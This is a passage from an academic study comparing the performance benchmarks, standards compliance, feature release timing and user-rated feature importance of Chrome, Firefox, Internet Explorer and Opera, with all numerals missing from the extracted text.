stamp to the crafted page via a url parameter. the crafted page creates a second time stamp indicating the start of the page processing. the difference between the two time stamps was defined as the browser start-up time. the start-up times are then sent to a server for logging. advantages of this procedure are, first, that it is independent of network conditions, and second, the test is similar to the user’s real experience of launching the browser and loading the first page. the first versions of chrome were the fastest to load (figure ). however, as chrome’s development advanced, it’s start-up times crawled up. in chrome version the start-up times improved dramatically, but then continued to crawl up from version . in version there was a spike in the start-up time, a . fold increase compared to the figure : cold start-up times. previous version, followed by a partial correction in versions and . surprisingly firefox start-up times look steady with a slight decrease, notably in version . as a result, while it was the slowest by a wide margin in , it became the fastest in . internet explorer start-up time were initially similar to those of chrome, but then increased consistently over time, making it roughly twice as slow as the others in recent years (except for the spike in chrome performance since version ). . conformance benchmarks results and interpretation . . html compliance html (hyper-text markup language) is the language used to describe web pages, and the current version is html . html introduced features like the <canvas> tag for use by multimedia applications, and integrated svg (scalable vector graphics) and mathml (for mathematical formulas). the first working draft of html was published in , and the standard was finally approved in , so its definition process fully overlaps the period of chrome’s rise. the html compliance benchmark consists of three parts. the main part is checking the conformance of the browser to the html official specification. the second part is checking specifications related to html such as webgl. the third part is checking the specification for experimental features that are an extension to html [ ]. the score is the sum of points awarded for each feature that is supported. the results for this benchmark show that all the browsers improve over time. firefox had the best score until version . , and after that chrome version and up had the best score (figure ). internet explorer always had the lowest score. . . css test css (cascading style sheets) is the language used to describe the style of html pages. for example, using css one can set the style for web page headings and make it different from the default of the browser. the current version is , although level- modules are being introduced. css test checks how many css elements in the w c specification does a certain browser recognize [ ]. this means css test only checks the recognition itself but does not check the implementation or the quality of the implementation, namely whether the resulting rendition of the web page indeed looks like it should. interestingly chrome’s score did not change in the first three years, though it still managed to have a better score than its rivals. from version chrome consistently improved until the last version tested, remaining better than its rivals all along (figure ). firefox showed several improvements in a stepwise manner. internet explorer figure : html compliance results. figure : css test results. figure : browserscope security results. had the lowest score in the first version tested (version ) but improved its score dramatically in versions and , achieving essentially the same level as firefox. . . browserscope security browserscope is a community-driven project which profiles various aspects of web browsers. one of these is the obviously important feature of security. specifically, browserscope security is a collection of tests meant to check “whether the browser supports javascript apis that allow safe interactions between sites, and whether it follows industry best practices for blocking harmful interactions between sites” [ ]. for example, one of the tests checks whether the browser has native support for json parsing, which is safer than using eval. the score is simply how many tests passed. while this is not strictly a conformance test, as there is no official standard, we include it due to the importance of security features on the internet. the results are that all three browsers exhibited a general (although not always monotonic) improvement in their security results over time. the relative ranking according to these tests is very consistent between browser versions (figure ). across practically the whole period chrome had the highest score, firefox had the lowest, and internet explorer was in between. the only exception is a large dip in score for chrome versions and , where version was the worst of all parallel browser versions. this was surprising because of the overall consistency, and the fact that in the first version released chrome had the highest score compared to its rivals. figure : sample opera results overlaid on the previous results. . additional results with opera our main measurements focused on the three top browsers, which together control more than % of the desktop market. but when considering the relative importance of technical issues as opposed to marketing, we felt the need to also consider the smaller browsers. this is especially important in the early years, when chrome’s market share was low, and the question was what enabled chrome to surge ahead while other browsers were left behind. we therefore conducted a few additional measurements using opera. we focused on opera and not on safari for two reasons. first, opera has a reputation for being an innovative and technologically advanced browser. second, safari is specifically targeted for apple platforms, and therefore is not really part of the same desktop market as the other browsers we are studying. not all versions of opera were tested, as many of the benchmarks did not run properly on early versions. the results were that opera performance was generally inferior to that of chrome (two examples are shown in figure ). in some benchmarks, notably browsermark and browserscope security, its scores were actually lower than for all other browsers for many years. the sharp improvement in browsermark shown in figure is probably due to the move to using webkit (and thus the same rendering engine as chrome) in version [ ]; similar improvements were also seen in some other benchmarks in this version. in other benchmarks, such as html compliance and css test, opera’s results were similar to those of firefox throughout. the only benchmark in which opera was the best browser for a considerable period was canvasmark, but this period only started in (and performance dropped in version ). feature selection and release another aspect in which the browsers differ from one another is their feature sets: all obviously have the same basic features allowing users to browse the web and display web pages, but new features are added all the time as web usage continues to evolve. however, not all features have the same importance, so it is advantageous for a browser to have the most meaningful features as early as possible. in this section we present the methodology and results pertaining to answering research question ( ), namely which browsers released features early and which browsers lagged in releasing features. in addition we wanted to evaluate the importance of each feature. we used an online survey to assess the importance of each feature to the end users. . experimental design and methodology the investigation of the features embodied in each browser and their release times involved the following steps: # feature explanation pre chrome bookmark management allows the user to organize/delete/add bookmarks password management allows the browser to remember credentials to a certain web site upon the user’s request search engine toolbar easy access to a search engine from the browser tool bar tabbed browsing the ability to browse multiple web pages in a single browser window pop-up blocking blocks pop-ups that the user didn’t explicitly ask for page zooming scale the text of a web page history manager manages history of recent web pages that the user browsed phishing protection block or warn when surfing to web pages that masquerade as another (legitimate) website privacy features manages the user preferences regarding passwords, history, and cookie collection smart bookmarks bookmarks that directly give access to functions of web sites, as opposed to filling web forms at the respective web site for accessing these functions tabbing navigation the ability to navigate between focusable elements with the tab key released at same time access keys allows you to navigate quickly through a web page via the keyboard adaptive address bar suggest webpages as you type an address or search keywords from your history or from a search engine full page zoom scales the whole page, including images and csss hardware acceleration allows the gpu to help the browser to speed up certain tasks that the gpu is more capable for incognito allows the user to browse the web with reduced identifiable trace (notably doesn’t allow cookies) reopen closed tabs reopen a recently closed tab full screen displays the page in full screen mode table : features not used in comparisons as they did not reflect differences between browsers. . listing of major features of modern browsers. . establishing the release date of each feature by each browser . identification of features that differentiate between the browsers . conducting an online survey of web users to assess the relative importance of the different features to end users . performing a statistical analysis of the relative importance (according to the survey) of features that each browser released earlier or later than other browsers. the following subsections provide details regarding these steps. . . feature selection we identified features which in our opinion represent a modern browser. these features are listed in table and table . the release date of each feature in each browser was ascertained by the combination of reading release documentation and checking whether features exist in the different versions we downloaded. the third step, namely identifying features that differentiate between the browsers, is based on the release dates. the reason is that features only differentiate between browsers if they are released at different times. as # feature explanation add-ons manager allows you to disable/remove previously installed add-ons download manager allows you to view/pause current downloads and view previously downloaded files auto-updater silently & automatically updates the browser if there’s a new version caret navigation allows you to navigate through a site using the arrow keys (just like in any document processor e.g. in microsoft word) pinned sites allows you to have faster access to your favorite sites like facebook or your email provider sync allows you to sync you favorites/preferences/saved passwords etc. through computers and platforms session restore (automatically) upon a crash, the browser will restore the sites you were surfing before the crash crash/security protection allows you to continue browsing although a site/plugin crashed or hanged malware protection enables the browser to warn and block suspicious sites that are known to be harmful outdated plugin detection allows the browser to detect if a plugin has become incompatible/vulnerable with the browser’s version do not track allows the browser to request sites not to track the browsing themes allows you to personalize the browser appearance by changing the skin experimental features allows you to try experimental features in the browsers that aren’t turned on by default multiple users allows you to have multiple profiles (different bookmarks/saved passwords/history) on the same computer user apps allows you to install applications that will run in the browser (like games or other applications) developer tools allows you to examine a site’s interaction with the browser personalized new tab allows you to see your most visited sites upon the launch of the browser (the first tab that is opened on launch of the browser) click-to-play disables the automatic launch of a plugin’s content. the user must explicitly click on the flash/applet in-order to load and play it print preview allows the user to view the page before printing it per-site security configuration allows you to control which sites will block popups/cookies/images/scripts/plug-ins etc. web translation allows the browser to translate a page automatically to a desired language spell checking marks misspelled input you typed and corrects it built-in pdf viewer allows the browser to open pdf files without any rd party plugins sandboxing a security concept that certain parts of the browser run individually with restricted privileges only rss reader allows the browser to know when a certain site, that supports rss, was updated. news feeds etc. table : selected features used in comparisons [arbitrary order]. figure : feature release margin example: the “personalized new tab” feature was released in chrome , internet explorer , and firefox (marked with arrows). chrome . was our starting point, features included in this version which had already been included also by the competing browsers were excluded from consideration, as they did not confer any competitive advantage to any browser in the context of our study. for example, this included multiple tab browsing. seven further features were excluded because they were released at about the same time by all three browsers, so they too did not confer any competitive advantage (table and see below). subsequently, the study was conducted based on the remaining features. these features are listed in table . note that the features are listed in a random order. . . feature release margins as the three browsers are developed by different organizations, the release dates of new versions are of course not coordinated. we therefore faced the challenge of defining what it means for one browser to release a feature ahead of another. we elected to use a conservative metric for this concept. we had already dated the release of each of the selected features in each browser (table ). we then developed a metric which states whether a certain browser released a feature ahead of a competitor by “a meaningful margin” and/or whether a certain browser lagged a competitor by “a meaningful margin”. a browser was awarded a “win” if it released a feature ahead of all its competitors, and a penalty or “loss” was given if a browser lagged all its competitors or did not released a certain feature at all. note that each feature can have a maximum of one “winner” and a maximum of one “loser”. if a feature had neither a “winner” nor a “loser” it was excluded from the study as no browser had a competitive advantage or disadvantage. “a meaningful margin” was defined as more than one release cycle, that is, when it took the competitors more than one version to include the feature after it was initially introduced. for example, “personalized new tab” was introduced in chrome . at the time the most recent versions of internet explorer and firefox were and , respectively. the feature was subsequently released in internet explorer and firefox , meaning that this was a meaningful margin. had the feature been released in internet explorer or firefox . it would not have counted as a meaningful margin, despite being later than chrome . furthermore, firefox lagged internet explorer in the release of the feature in a meaningful margin (figure ). so in this case chrome received a “win” and firefox received a “loss”. all the release versions and their identification as wins or losses are shown in the results in table . note that the definition of the release margin is based on releases of new versions, and not on absolute time. this definition gives an advantage to browsers that are released infrequently. for example, any innovations included in chrome versions to — a span of nearly two years — and included in internet explorer would not be considered to have a significant margin, because microsoft did not release any versions during all this time. consequently our results may be considered to be conservative. . . feature importance survey to assess the relative importance of the different features, we created an online survey that lists and explains these features. survey participants were asked to evaluate the importance of each feature relative to other listed features on a discrete scale of (least important) through (most important). the features were listed in the same random order as in table . the intended audience were people who spend many hours a day on the world wide web. the survey was published on reddit (sub-reddit /r/samplesize) [ ] and on cs facebook groups of the hebrew university and tel-aviv university in israel. people answered the survey, and the distribution of results is shown in table . the statistical analysis was performed on all of the participants. . statistical analysis procedure opinion surveys like the one we conducted are commonly analyzed by calculating the average score received by each entry, and considering these to be the averages of samples of different sizes and unknown variance. then a test such as welch’s t-test is used to check whether or not these averages are significantly different. however, such an approach suffers from a threat to construct validity, because averaging implicitly assumes that the scale is a proper interval scale, meaning that the difference between and is the same as between and , and , and and . but given that these numbers represent subjective levels of importance, this is not necessarily the case. moreover, different people may use the scale differently. therefore both the averaging and the statistical test are compromized. another problem with human users is that some of them are hard to please, and always use only the bottom part of the scale, while others are easy to please, and focus on the top part of the scale. to reduce this danger our survey participation instructions included the following: “for every feature please choose how important this particular feature is compared to other features in the survey. please try to use the full scale from ‘least important’ to ‘most important’ for the different features. you can change your marks as often as you wish before submitting.” and indeed, checking our data we found that most respondents actually used the full scale from to , with an average near . these findings imply that we do not need to perform adjustments to the data to compensate for potentially different behaviors [ ]. nevertheless, comparing average scores is still not justifiable. we therefore use an analysis method due to yakir and gilula, where brand a is judged to be superior to brand b if the distribution of opinions about a dominates the distribution of opinions about b in the stochastic order sense [ ]. note that in our case the “brands” are not microsoft, google, and mozilla, but rather the sets of features which represent the “wins” or “losses” of each browser. this will be clear in the results of subsection . . mathematically stochastic order is expressed as ∀s : fa(s) ≤ fb(s), where fa and fb are the cumulative distribution functions of the opinions regarding a and b, respectively. graphically, the plot of fa is lower and to the right of the plot of fb, and it accumulates more slowly. in simple terms this means that for each level of opinion to the probability that a receives a score of at least this level is higher than the probability that b receives such a score. however, in many cases one distribution does not dominate the other (and their graphs cross each other). it is then necessary to adjust the data by grouping brands and/or score levels together until dominance is achieved [ , , , ]. in more detail, the analysis procedure is as follows [ ]: . identify subsets of homogeneous brands. ideally, for all pairs of brands, the distribution of scores of one brand will dominate the distribution of scores of the other brand. this will induce a full order on the brands. but in reality there may be certain subsets of brands that are incomparable, and do not dominate each other. these subsets need to be identified, and the ranking will then be between subsets instead of between individual brands. the subsets are found by an agglomerative single-link clustering algorithm. initially all pairs of individual brands are compared, and the chi-squared statistics computed. if the minimum statistic value obtained is below a predefined critical value, the two distributions are considered the same and the brands are combined into a joint subset. in subsequent steps, when subsets are being considered, the maximal statistic among all pairs (where one brand comes from the first subset and the other brand from the second subset) is compared to the critical value. the suggested critical value is the upper α percentile from the chi-square distribution with j − degrees of freedom, where j is the number of score levels in the distribution (in our case, ) and α = . (or another value chosen by the analyst). a chi-square-based test is then applied to test whether the obtained partitioning is significant, as described in [ ]. the result of this step is then one or more subsets of brands, which are heterogeneous relative to each other, but the brands within each subset are homogeneous. . find the widest collapsed scale. even when brands (or subsets of brands) have heterogeneous distributions of scores, the distributions may not dominate each other in the stochastic order sense. this happens if the distributions cross each other. however, it is always possible to create a dominance relationship by collapsing adjacent scores and thereby reducing the fidelity of the distributions. the problem is that collapsing can be done in many different ways, and the selected collapsing may affect the resulting dominance order. we therefore need to define which collapsing is better. the suggested approach is to strive for minimal loss of information, in the sense of preserving as many of the original scores as possible. hence we are looking for the widest collapsed scale that nevertheless leads to dominance. technically, the procedure is as follows. given all the subsets of brands, we consider all possible orders of these subsets. for each such order we find the collapsing that leads to dominance in this order (if such a collapsing exists). the order that is supported by the widest collapsing is then selected. this implies using the collapsing which retains the highest number of distinct scores. . note the stochastic order between the subsets of brands. at this point a well-defined stochastic order is guaranteed to exist. this order is the result of the analysis. . verify statistical significance. collapsing score levels leads to loss of information relative to the original data. a chi-square-based test is used to demonstrate that the loss is not significant, and therefore the results will still reflect the original data. for details see [ ]. in our case the brands are the features of the browsers. but we don’t really care about ranking the individual features. rather, we want to rank sets of features. for example, we can take the set of features that were chrome “wins”, and compare it to the set of features that were chrome “losses”. if the first set turns out to be more important to users, then this testifies that chrome project managers chose wisely and invested their resources in prioritizing the more important features first. to perform these calculations we used the insight for r v . software package which implements this ap- proach . given the adjusted (collapsed) data, we also calculate the polarity index. the polarity index is the ratio of users who considered features important (levels and ) to the rest (levels to ). a polarity index less than indicates that the balance is skewed towards not important, while a polarity index higher than indicates that user opinion is skewed towards most important. unlike average scores, the polarity index has a direct quantitative meaning and therefore the indexes of different brands can be compared to each other. . results . . early release of features in order to analyze which browser released features earlier than its competitors we identified the “wins” and “losses” of each browser, as indicated in table . our results show that chrome received a “win” in features and firefox in features. in contrast, internet explorer did not receive any “wins”, and features did not have a “winner”. chrome received a “loss” in features, firefox in features, and internet explorer in features. here only one feature was not ascribed as a “loss” to any of the browsers (the “web translation” feature). these results already show that chrome tended to release new features ahead of the other browsers, with firefox being a very close second. internet explorer lagged far behind both of them, as it did not release any feature ahead of the competition and it was the last to release half of the features in the study. the software and statistics advice were kindly provided by professor zvi gilula. # feature feature release version survey results explorer firefox chrome add-ons manager pre pre l download manager l pre auto-updater l w caret navigation pre none l pinned sites l sync l session restore (automatically) l pre crash/security protection l malware protection l outdated plugin detection none l w do not track l themes none l pre w experimental features none l pre w multiple users none l pre w apps none l w developer tools l personalized new tab l w click-to-play none l w print preview pre pre l per-site security configuration l w web translation none none w spell checking l pre built-in pdf viewer none l w sandboxing pre none l rss reader pre none l table : feature release versions and survey results. w and l denote wins and losses, respectively. . . importance comparisons mere counting of “wins” and “losses” as done above does not indicate whether the features released early by chrome were indeed the more important ones. we therefore conducted an analysis of importance by comparing the distributions of importance scores given to the sets of features that were “wins” and “losses”. specifically, we performed an analysis of the “wins” of different browsers, an analysis of their “losses”, and a specific analysis of the “wins” versus the “losses” of chrome. wins the results of comparing the user opinions regarding the feature sets where each browser “won” is shown in table . a stochastic order of the response levels was present without any adjustments, with chrome ranked first and firefox second. since internet explorer did not have any “wins” it was ranked last. the polarity index of chrome and firefox were . and . , respectively. while both are smaller than , the features in which chrome received a “win” were still more important to the end user, since the polarity index was higher. the direct quantitative meaning is that for chrome users considered the “winning” features to be important of the time, whereas for firefox they considered them to be important only about of the time. losses given limited resources the developers of a browser cannot do everything at once, so the implementation of select features must be delayed. under such circumstances it is best to delay those features that will not be missed by many users, namely those that are considered less important. therefore, a lower ranking and a lower no. of importance score dist. polarity rank browser wins index chrome . . . . . . firefox . . . . . . internet explorer n/a n/a n/a n/a n/a n/a table : comparison between chrome and firefox “wins”. no. of importance score dist. polarity rank browser losses - index∗ firefox . . . . . internet explorer chrome . . . . . table : comparison between chrome and firefox/internet explorer “losses”. note that is this case being ranked lower is better. the polarity index is calculated differently than in other cases because scores and were collapsed. polarity index are favorable when comparing feature sets which are “losses”. the “loss” scores distributions of firefox and internet explorer showed the same trends and could not be distinguished one from the other, so they were clustered together. in order to achieve dominance the ranking algorithm collapsed importance score levels and (table ). the result after these adjustments was that firefox and internet explorer were ranked on top and chrome was ranked lower. this means that the features in which firefox and internet explorer received a “loss” were more important to the end users. however, it should be noted that the differences in the distributions were actually very small, so this difference is most probably meaningless. the polarity index could not be calculated in the regular way due to the unification of levels and . the results given in the table are therefore the ratio of levels to to levels and , making them higher than in other comparisons. they are close to each other, but still chrome is a bit lower, which is better in this case. chrome wins and losses finally, we compared the features that chrome “won” with those that it “lost”. in order to achieve a stochastic order the algorithm collapsed levels and together. interestingly the “losses” won, meaning that they were considered more important (table ). the polarity index of the “wins” and the “losses” were . and . , respectively, meaning the features which chrome released ahead of its rivals were considered important to the users about % of the time, whereas those in which it lagged behind were considered important nearly % of the time. thus the prioritization used in developing chrome was better than that of its rivals (as shown in the two previous analyses), but it was far from perfect. discussion . summary of results we tested the performance of the three dominant browsers, chrome, firefox, and internet explorer, and to a lesser degree also the opera browser, using a wide set of commonly used benchmarks and across a long period of time. the results, presented in subsection . through subsection . and summarized in table , show that chrome no. of importance score dist. polarity rank class features - index losses . . . . . wins . . . . . table : comparison between chrome “wins” and “losses”. benchmark result sunspider chrome was best through , now internet explorer is signifi- cantly better browsermark . chrome is best, explorer worst canvasmark chrome is relatively good but inconsistent, firefox worst peacekeeper chrome is significantly better start-up times initially chrome was better but now firefox is better, explorer has deteriorated html compliance chrome is better, explorer worst css test chrome is better browserscope security chrome is better, firefox worst table : summary of benchmark results. generally had an advantage over its competitors, both in terms of performance and in terms of conformance with standards. more specifically, chrome achieved better results throughout in five of the tests: browsermark . , peace- keeper, html compliance, css test, and browserscope security. firefox achieved better results only in the start-up times test, and that only towards the end of the study period. interestingly, chrome start-up times results may indicate that chrome suffers from a feature creep impacting its start-up times. internet explorer achieved better results only in sunspider, in the second half of the study period. moreover, chrome was not worse than both competing browsers in any of the benchmarks, while firefox and internet explorer were each the worst browser in two cases. in addition we compared the release dates and importance of specific features, as described in subsection . . eleven features had a “winner”, meaning that they were released by one browser ahead of the others by a meaningful margin. all but one also had a “loser”, that is a browser that lagged behind by a significant margin. the relatively low fraction of features that had a “winner” (and the fact that features were excluded from the study because they did not have a “winner” nor a “loser”) indicates that the development of each browser is not isolated from its rivals. as a result, some features are released at about the same time by two or even all three browsers. on the other hand, some browsers still managed to release a fair number of innovative features: chrome and firefox received and “wins”, respectively. internet explorer on the other hand did not receive any “wins” and had the most “losses”, . chrome and firefox had and “losses”, respectively. although chrome and firefox received similar numbers of “wins” the feature importance survey showed that features in which chrome “won” were more important to the users than features in which firefox “won”. likewise, features in which chrome “lost” were less important to users than the features in which firefox and internet explorer had “lost”, but in the case of losses the difference was marginal. interestingly, chrome “losses” were actually more important to users than its “wins”. ideally a browser should release the most important features to users first, and in case it has to lag in the release of certain features they should be of less importance to users. the results indicate that chrome project managers were somewhat better at releasing important features first than the project managers of competing browsers. this means that they generally made better choices than their rivals. however, they did not manage to focus on only the important features, and when they lagged in feature release, these features were sometimes actually more important to users. . implications for software development while not the focus of our study, our results can be used to gleam some insights into basic questions in large-scale software development. this is based on the fact that the three main browsers were developed in rather different ways. however, this is somewhat speculative, and additional work is needed. one major question is the comparison of open source and proprietary software development. our results regarding firefox and internet explorer provide some evidence for the potential superiority of large-scale open- source projects. up to firefox was quickly gaining market share at the expense of internet explorer, and our benchmark results indicate that it appears to have had superior performance for most of them (this conclusion is restricted, however, by the fact that we did not measure internet explorer and and the early versions of firefox). it also appears to have been more innovative, as reflected by having some “wins” in early introduction of new features, and much less “losses” than internet explorer. this is an important result, as it demonstrates that a large open-source project can in fact prioritize features better than a competing product developed in-house by a leading software firm. of course this does not imply that this is always the case, but it provides an important case study as an instance. however, in later years chrome came to overshadow firefox. to the degree that chrome is an in-house product this implies that large company projects can also be better than open-source ones. the conclusion would then be that the main factor is not the project management style but rather the companies involved, in this case microsoft as opposed to google. but such a conclusion is tainted by the fact that chrome is closely related to the open-source chromium project. so maybe the most important factor is the various project managers and contributors. this calls for further investigation as noted in the future work section below. another sometimes contentious aspect of software development is the use of agile methodologies with a rapid release cycle as opposed to heavier plan-based methodologies with large-scale infrequent releases. tabulating the browser version release dates indicates that chrome and firefox transitioned to rapid development methods, releasing a new version every - weeks (figure ). this meant that there were more releases and each release contained fewer new features, leading to more focus in the work on each new release. at the same time, with rapid releases the development teams could respond more quickly to their competitors’ released features which they considered to be important, and also respond quickly to user feedback and requests. microsoft retained the traditional slow release cycle for internet explorer, releasing only versions during the years of the study, compared with released versions of chrome. this may have contributed to internet explorer’s downfall. . threats to validity various threats to validity have been mentioned in previous sections. here we note them together and expand on them. the first threat relates to the assessment that chrome is the dominant browser, as shown in figure . first, as noted, this data comes from statcounter, and other counting services may reach different conclusions. second, we focused on desktop systems, and the picture may be different on other platforms such as mobile. to address these concerns we checked other counting services and platforms, and found that most of them indicate that chrome is of growing importance and often dominant. the most prominent dissenter is netmarketshare.com, which claims that internet explorer is still the dominant browser worldwide by a large margin ( % for explorer vs. % for chrome in january ) [ ]. the difference is probably due to a much smaller sample ( thousand web sites as opposed to million for statcounter) and differences in methodology, including an attempt to count unique users per day and to weight countries by their total traffic. we believe that the statcounter data is more reliable, and specifically prefer to count activity and not users. the issue of the mobile market is mentioned below in the future work section. another threat to the validity of the work reported so far is its focus on purely technical aspects of browsers. we did not check the marketing aspect of the browsers, hence, we cannot separate the technical superiority from the brand name. for example, according to [ ] an important aspect of chrome’s rise was “the great promotional efforts produced by google” in the shape of promotional videos released on the web. examples of such videos are given, including the “chrome speed tests” video released in may that went viral; at this time chrome was just beginning its rise in market share, and the video may have contributed to its momentum. all videos were released by april , when chrome had already overtaken firefox but was still second to internet explorer. additional work from a marketing perspective is needed to alleviate this concern. a third threat is that we compared chrome’s performance with only two main rivals (internet explorer and firefox) and partially also with a third (opera). there are many other browsers as well, and maybe chrome is not better than all of them. the focus on this set of contenders is justified by the fact that together with chrome they account for well over % of the desktop browsers market. however, if any of the smaller browsers is indeed superior to chrome and the others, this would testify to the importance of branding and marketing relative to technical considerations. using existing benchmarks is also a threat to validity, especially since their documentation is sometimes short on details of exactly what they measure and how. however, it should be noted that benchmarking browsers (and other system types for that matter) is not trivial. therefore we preferred to rely on prominent benchmarks that have established themselves over the years instead of trying to devise our own — and risk threats to validity that result from our inexperience in such benchmarking. that being said, it should be noted that the benchmarks do not test all possible aspects of browser technology. for example, it is possible to conduct a more detailed study of compatibility issues [ ] to try and quantify the problems that may occur with each browser. finally, a possible threat to validity concerning the introduction of new features is that such features could be introduced in plugins before being integrated into the browser core. this would cause the dates of the releases which first included these features to be misleading. however, we do not consider this to be a serious threat as even the most popular plugins are used by only a small fraction of users. . future work a drawback of the current work is its focus on the desktop market. obviously examining competing browsers in the mobile market would also be interesting. using statcounter.com data, it turns out that chrome is now also the leading browser on mobile platforms [ ]. however, its rise started much later, and accelerated considerably only in , eventually surpassing both the android and safari browsers. it would be interesting to repeat our measurements with multiple releases of these browsers, and perhaps also with uc browser, which is the fourth- ranked browser and also seems to be gaining market share, especially in emerging markets. another potentially interesting line of study is to try and compare the relative importance of technical consid- erations, marketing campaigns and practices, and brand name. it is widely accepted that internet explorer gained its market dominance by being bundled with the windows operating system, and it is reasonable to assume that the strength of uc browser in emerging markets is related to the strength of the company which developed it, chinese mobile internet company uc mobile. chrome most probably benefited from the google brand name and from google’s marketing campaign. but how to separate these effects remains an open question. in the late s the browser war between internet explorer and mozilla (later firefox) was portrayed in colors of a race between proprietary software and open source software. chrome is a unique combination of both. it was initially developed within google, but then it was largely turned into an open source project. an open question is whether it was really turned over to the open source community, or remains largely under google control, both in terms of code contributions and in terms of management. thus an interesting direction for further work is to dissect the sources of advances made in chrome (or rather chromium), and to see how many of them can be attributed to developers outside google. conclusions we tested the technical performance of the three major browsers (chrome, firefox, and internet explorer) and compared the release times of features. overall it seems that all three browsers became better over time, as most of the benchmarks that were examined showed a clear improvement trend, and all the browsers evolved and received better results. it is also apparent that the release rate of versions became more frequent over the years (especially for chrome and firefox). in conclusion, the cumulative evidence we have collected indicates that chrome’s rise to dominance is indeed consistent with technical superiority over its rivals and with insightful management of feature selection. however, we still cannot say that it is the result of technical superiority alone, as marketing and the google brand probably also played an important role. studying the marketing campaign may well be a worthwhile effort. acknowledgments many thanks to zvi gilula for his explanations about statistical procedures and for providing the software used in the analysis. this work is a greatly extended version of a class project done with kobi atiya, who contributed to the conceptual design and initial results. the opera measurements were performed by amir massarwi. references [ ] url: http://www.w .org/people/berners-lee/worldwideweb.html. [ ] chached version of http://www.netscape.com/newsref/pr/newsrelease .html. url: http://xml.coverpages. org/netscapecode .html. [ ] url: https://web.archive.org/web/ /http://weblogs.mozillazine. org/ben/archives/ .html. [ ] url: http://www-archive.mozilla.org/roadmap/roadmap- -apr- .html. [ ] url: http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/ en-us/firefox/releases/ . .html. [ ] url: http://mozilla.github.io/process-releases/draft/development_overview/. [ ] url: http://blog.mozilla.org/channels/ / / /every-six-weeks/. [ ] url: http://blog.chromium.org/ / /welcome-to-chromium_ .html. [ ] url: https://code.google.com/p/chromium/wiki/chromiumbrowservsgooglechrome. [ ] url: http://blog.chromium.org/ / /release-early-release-often.html. [ ] url: http://gs.statcounter.com/. [ ] url: http://www.w schools.com/browsers/browsers_stats.asp. [ ] url: http://netmarketshare.com/. [ ] url: https://www.webkit.org/perf/sunspider/versions.html. [ ] url: https://www.webkit.org/blog/ /announcing-sunspider- - /. [ ] url: https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver. html. [ ] url: https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver. html. [ ] url: http://blogs.msdn.com/b/ie/archive/ / / /html -and-real-world- site-performance-seventh-ie -platform-preview-available-for-developers. aspx. http://www.w .org/people/berners-lee/worldwideweb.html http://xml.coverpages.org/netscapecode .html http://xml.coverpages.org/netscapecode .html https://web.archive.org/web/ /http://weblogs.mozillazine.org/ben/archives/ .html https://web.archive.org/web/ /http://weblogs.mozillazine.org/ben/archives/ .html http://www-archive.mozilla.org/roadmap/roadmap- -apr- .html http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/en-us/firefox/releases/ . .html http://website-archive.mozilla.org/www.mozilla.org/firefox_releasenotes/en-us/firefox/releases/ . .html http://mozilla.github.io/process-releases/draft/development_overview/ http://blog.mozilla.org/channels/ / / /every-six-weeks/ http://blog.chromium.org/ / /welcome-to-chromium_ .html https://code.google.com/p/chromium/wiki/chromiumbrowservsgooglechrome http://blog.chromium.org/ / /release-early-release-often.html http://gs.statcounter.com/ http://www.w schools.com/browsers/browsers_stats.asp http://netmarketshare.com/ https://www.webkit.org/perf/sunspider/versions.html https://www.webkit.org/blog/ /announcing-sunspider- - / https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html https://www.webkit.org/perf/sunspider- . . /sunspider- . . /driver.html http://blogs.msdn.com/b/ie/archive/ / / /html -and-real-world-site-performance-seventh-ie -platform-preview-available-for-developers.aspx http://blogs.msdn.com/b/ie/archive/ / / /html -and-real-world-site-performance-seventh-ie -platform-preview-available-for-developers.aspx http://blogs.msdn.com/b/ie/archive/ / / /html -and-real-world-site-performance-seventh-ie -platform-preview-available-for-developers.aspx [ ] url: http://digitizor.com/ / / /internet-explorer- -caught-cheating- in-sunspider-benchmark/. [ ] url: http://www.kevs d.co.uk/dev/canvasmark/. [ ] url: http://peacekeeper.futuremark.com/faq.action. [ ] url: http://html test.com/about.html. [ ] url: http://css test.com/. [ ] url: http://www.browserscope.org/security/about. [ ] url: https://dev.opera.com/blog/ -million-users-and-move-to-webkit/. [ ] url: http://www.reddit.com/r/samplesize/. [ ] url: http://www.makeuseof.com/tag/ -awesome-google-chrome-promo-videos/. [ ] hal berghel. “who won the mosaic war?” in: comm. acm . ( ), pp. – . [ ] shauvik roy chaudhary, mukul r. prasad, and alessandro orso. “x-pert: accurate identification of cross-browser issues in web applications”. in: intl. conf. software engineering. . , pp. – . doi: . /icse. . . [ ] zvi gilula. “grouping and association in contingency tables: an exploratory canonical correlation ap- proach”. in: j. am. stat. assoc. . ( ), pp. – . doi: . / . [ ] zvi gilula and abba m. krieger. “collapsed two-way contingency tables and the chi-square reduction principle”. in: j. r. stat. soc. b (methodological) . ( ), pp. – . [ ] zvi gilula, abba m. krieger, and yaakov ritov. “ordinal association in contingency tables: some inter- pretive aspects”. in: j. am. stat. assoc. . ( ), pp. – . [ ] ted g. lewis. microsoft rising. ieee computer society press, . [ ] patrick meenan. “how fast is your website?” in: comm. acm . ( ), pp. – . doi: . / . . [ ] barry phillips. “designers: the browser war casualties”. in: computer . ( ), pp. – . url: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= . [ ] gregor richards, andreas gal, brendan eich, and jan vitek. “automated construction of javascript bench- marks”. in: acm sigplan notices . ( ), pp. – . url: http://dl.acm.org/citation. cfm?id= . [ ] ya’acov ritov and zvi gilula. “analysis of contingency tables by correspondence models subject to order constraints”. in: j. am. stat. assoc. . ( ), pp. – . doi: . / . url: http://www.tandfonline.com/doi/abs/ . / . . . [ ] peter e. rossi, zvi gilula, and greg m. allenby. “overcoming scale usage heterogeneity: a bayesian hier- archical approach”. in: j. am. stat. assoc. . ( ), pp. – . doi: . / . url: http://www.tandfonline.com/doi/abs/ . / . [ ] steve sounders. “high-performance web sites”. in: comm. acm . ( ), pp. – . doi: . / . . [ ] ronald j. vetter, chris spell, and charles ward. “mosaic and the world wide web”. in: computer . ( ), pp. – . url: http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= . [ ] paul windrum. “leveraging technological externalities in complex technologies: microsoft’s exploitation of standards in the browser wars”. in: research policy . ( ), pp. – . url: http://www. sciencedirect.com/science/article/pii/s . http://digitizor.com/ / / 